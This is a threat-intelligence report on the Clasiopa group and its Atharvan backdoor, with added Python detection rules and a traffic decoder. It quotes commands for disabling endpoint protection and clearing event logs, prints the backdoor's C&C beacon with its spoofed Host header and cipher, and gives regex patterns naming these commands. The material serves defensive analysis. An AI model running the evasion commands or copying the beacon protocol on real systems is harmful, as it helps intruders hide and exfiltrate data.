A hitherto unknown attack group has been observed targeting a materials research organization in Asia. The group, which Symantec calls Clasiopa, is characterized by a distinct toolset, which includes one piece of custom malware (Backdoor.Atharvan). At present, there is no firm evidence of where Clasiopa is based or on whose behalf it acts.
Clasiopa Tactics, Techniques, and Procedures
The infection vector used by Clasiopa is unknown, although there is some evidence to suggest that the attackers gain access through brute force attacks on public facing servers.
Aside from the distinct toolset used, there were a number of attack hallmarks observed:
- The attackers checked the IP addresses of the computers they were on using: https://ifconfig.me/ip
- An attempt was made to disable Symantec Endpoint Protection (SEP) by stopping the SepMasterService. The result of this query was checked and then a second attempt was made to disable SEP using “smc -stop”. Note that any commands attempting to stop SEP will only work if the attacker has administrative credentials and the SEP administrator has disabled anti-tamper protection.
- The attackers used multiple backdoors to build lists of file names and exfiltrate them. These lists were exfiltrated either in a Thumb.db file or a Zip archive.
- Sysmon logs were cleared using wsmprovhost.
- All eventlogs were cleared using PowerShell.
- A scheduled task named “network service” was created to list file names.
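The hallmarks above are the kind of behaviour a process-creation log (Sysmon Event ID 1, EDR telemetry) records verbatim, so they translate directly into detection content. The following Python is an added example, not code from the Symantec report: it runs a small rule set over constructed sample command lines (the events, process names and exact command syntax are made up for illustration; the SEP-stopping commands, the "network service" task name and the ifconfig.me check are the ones named in the report). The Sysmon clearing via wsmprovhost has no command line on the page, so it gets no rule.

```python
import re

# One regex per hallmark from the report. Matching is over the command line only.
RULES = [
    ("ip_check_ifconfig_me", re.compile(r"ifconfig\.me/ip", re.I)),
    ("sep_service_stop", re.compile(r"\b(net|sc)(\.exe)?\s+stop\s+SepMasterService\b", re.I)),
    ("sep_smc_stop", re.compile(r"\bsmc(\.exe)?\s+-stop\b", re.I)),
    ("eventlog_clear", re.compile(r"Clear-EventLog|\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    ("task_network_service", re.compile(r"\bschtasks(\.exe)?\s+/create\b.*\bnetwork service\b", re.I)),
]

# Constructed process-creation events as (process, command line); not taken from the report.
SAMPLE_EVENTS = [
    ("cmd.exe", "cmd.exe /c curl https://ifconfig.me/ip"),
    ("net.exe", "net stop SepMasterService"),
    ("smc.exe", "smc -stop"),
    ("powershell.exe",
     'powershell.exe -Command "Get-EventLog -List | ForEach-Object { Clear-EventLog -LogName $_.Log }"'),
    ("schtasks.exe", 'schtasks /create /tn "network service" /tr "cmd /c dir C:\\ /s" /sc daily'),
    ("svchost.exe", "svchost.exe -k netsvcs"),  # benign noise that must not fire
]


def detect(events):
    """Return (rule name, process, command line) for every event that matches a rule."""
    hits = []
    for process, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.append((name, process, cmdline))
    return hits


def summarize(events):
    """Group hits by rule. Several distinct hallmarks on one host within a short
    window is a much stronger signal than any single rule firing."""
    by_rule = {}
    for name, _process, cmdline in detect(events):
        by_rule.setdefault(name, []).append(cmdline)
    return by_rule


if __name__ == "__main__":
    for rule, cmdlines in summarize(SAMPLE_EVENTS).items():
        print(f"{rule}: {cmdlines}")
```

Note that "smc -stop" and stopping SepMasterService only succeed when the attacker already holds administrative credentials and anti-tamper protection is off, but the attempt itself is logged either way, which is what the rules key on.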
There is some evidence to suggest that the attackers used two legitimate software packages. One compromised computer was running Agile DGS and Agile FD servers, software developed by Jiangsu. These packages are used for document security and protection in transit. Malicious files were dropped into a folder named “dgs” and one of the backdoors used was renamed from atharvan.exe to agile_update.exe. It is unclear if these software packages are being injected into or installed by the attackers.
HCL Domino (formerly IBM Domino) was also run on a compromised machine in close proximity to the execution of backdoors, although it is unclear if this was a coincidence or not. However, both the Domino and Agile software appear to be using old certificates and the Agile servers use old vulnerable libraries.
Tools Used
- Atharvan: Custom developed remote access Trojan (RAT).
- Lilith: The attackers used modified versions of the publicly available Lilith RAT. The versions used were capable of carrying out the following tasks:
  - Killing the process
  - Restarting the process
  - Modifying the sleep interval
  - Uninstalling the RAT
  - Executing a remote command or PowerShell script
  - Exiting the process
- Thumbsender: Hacking tool which, when it receives a command from a command-and-control (C&C) server, lists file names on the computer and saves them in a file called Thumb.db before sending them to a specified IP address.
- Custom proxy tool.
Atharvan
Atharvan is so named because, when the malware is run, it creates a mutex named “SAPTARISHI-ATHARVAN-101” to ensure that only one copy is running.
It will then contact a hardcoded C&C server. The hardcoded C&C address seen in one of the samples analyzed to date was in the Amazon AWS South Korea (Seoul) region, which is not a common location for C&C infrastructure.
The C&C communications are formatted as HTTP POST requests where the Host header is hardcoded as “update.microsoft.com”, e.g.:
POST /update.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52
Host: update.microsoft.com
Content-type: application/x-www-form-urlencoded
Content-length: 46
id=Atharvan&code=101&cid=H^[REDACTED]&time=5
The request body includes the following parameters:
- “id”: hardcoded string “Atharvan”
- “code”: represents request purpose, which can be one of:
  - 101: fetches commands
  - 102: sends command outputs or error messages
  - 103: fetches file body to write when processing command 0x12
- “cid”: hardcoded string “H^” followed by the network interface hardware address of the affected computer as 12 hexadecimal digits
- “time”: interval between communication attempts
- “msg” (optional): depending on the request purpose as specified using the “code” parameter:
  - when the “code” parameter is 102, it includes output of commands or error messages in encrypted form
  - when the “code” parameter is 103, it identifies the file to fetch in non-encrypted form
When encrypting the “msg” value, the malware uses the following encryption algorithm:
    def encrypt(plaintext):
        # Each byte b becomes (2 - b) mod 256
        return bytes([((2 - byte) & 0xff) for byte in plaintext])
The malware uses its own simplistic HTTP parser to extract the body from the server response. The extracted body is decrypted using the following algorithm:
    def decrypt(ciphertext):
        # Same transform as encrypt(): (2 - b) mod 256 is its own inverse
        return bytes([((2 - byte) & 0xff) for byte in ciphertext])
When fetching commands, the malware expects the decrypted body to contain a sequence of strings separated by the 0x1A byte.
The first byte of each string specifies the command to execute, and the remaining bytes are interpreted as command parameters.
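The beacon format, the byte transform and the 0x1A-separated command layout described above are enough to build an analyst-side decoder for captured traffic. The following Python is an added example, not code from the Symantec report or from the malware: it parses a beacon POST, recovers the MAC from the “cid” field, decodes a code-102 “msg”, and splits a decrypted server reply into (opcode, parameter) pairs. It assumes the “msg” value is percent-encoded in the form body (the report does not say how it is encoded); the MAC, the command output and the server body are constructed, and 0x33 is an arbitrary placeholder opcode, whereas 0x12 is the file-write command the report names.

```python
from urllib.parse import quote_from_bytes, unquote_to_bytes

# Request purposes from the report, keyed by the "code" parameter.
CODE_PURPOSE = {101: "fetch commands", 102: "command output / error", 103: "fetch file body"}
# Separator between command strings in a decrypted server body (0x1A, per the report).
COMMAND_SEPARATOR = b"\x1a"


def atharvan_codec(data: bytes) -> bytes:
    """The report's encrypt()/decrypt(): each byte b becomes (2 - b) mod 256.
    Applying it twice returns the original, so one function serves both directions."""
    return bytes(((2 - b) & 0xFF) for b in data)


def _split_http(raw: bytes):
    """Split an HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def _parse_form(body: bytes) -> dict:
    """Decode application/x-www-form-urlencoded pairs to {str: bytes}.
    Assumption (not stated in the report): the msg value is percent-encoded."""
    fields = {}
    for pair in body.split(b"&"):
        if pair:
            key, _, value = pair.partition(b"=")
            fields[unquote_to_bytes(key).decode("latin-1")] = unquote_to_bytes(value)
    return fields


def parse_beacon(raw_request: bytes):
    """Return the decoded fields of an Atharvan beacon, or None if the POST is not one."""
    start_line, headers, body = _split_http(raw_request)
    if not start_line.startswith("POST "):
        return None
    fields = _parse_form(body)
    if fields.get("id") != b"Atharvan":
        return None
    code = int(fields.get("code", b"0"))
    cid = fields.get("cid", b"")
    hexpart = cid[2:].decode("latin-1")
    mac = None
    if cid.startswith(b"H^") and len(hexpart) == 12 and all(c in "0123456789abcdefABCDEF" for c in hexpart):
        mac = ":".join(hexpart[i:i + 2] for i in range(0, 12, 2)).lower()
    msg = fields.get("msg")
    if msg is not None and code == 102:
        msg = atharvan_codec(msg)  # only code 102 carries msg in encrypted form
    return {
        "host": headers.get("host"),
        "code": code,
        "purpose": CODE_PURPOSE.get(code, "unknown"),
        "mac": mac,
        "interval": int(fields.get("time", b"0")),
        "msg": msg,
    }


def parse_server_response(raw_response: bytes):
    """Decrypt the body of a C&C reply and split it into (opcode, parameter bytes) pairs."""
    _, _, body = _split_http(raw_response)
    commands = []
    for chunk in atharvan_codec(body).split(COMMAND_SEPARATOR):
        if chunk:
            commands.append((chunk[0], chunk[1:]))
    return commands


# Constructed samples: made-up MAC, command output and server body; header lines mirror the report.
SAMPLE_OUTPUT = b"Volume in drive C has no label.\r\n"
_ENC_MSG = quote_from_bytes(atharvan_codec(SAMPLE_OUTPUT), safe="").encode("ascii")
SAMPLE_BODY = b"id=Atharvan&code=102&cid=H^0A1B2C3D4E5F&time=5&msg=" + _ENC_MSG
SAMPLE_REQUEST = (
    b"POST /update.php HTTP/1.1\r\n"
    b"Host: update.microsoft.com\r\n"
    b"Content-type: application/x-www-form-urlencoded\r\n"
    b"Content-length: " + str(len(SAMPLE_BODY)).encode("ascii") + b"\r\n\r\n" + SAMPLE_BODY
)
# 0x12 is the file-write command named in the report; 0x33 is an arbitrary placeholder opcode.
_PLAIN_COMMANDS = b"\x12C:\\Users\\Public\\update.dat" + COMMAND_SEPARATOR + b"\x33"
SAMPLE_RESPONSE = b"HTTP/1.1 200 OK\r\nContent-type: text/html\r\n\r\n" + atharvan_codec(_PLAIN_COMMANDS)

if __name__ == "__main__":
    print(parse_beacon(SAMPLE_REQUEST))
    print(parse_server_response(SAMPLE_RESPONSE))
```

Two points worth carrying into detection content: a POST whose Host header says update.microsoft.com but whose body starts with id=Atharvan is the cheapest network signature here, and because the transform is its own inverse, one decoder handles both directions of a captured session.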
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research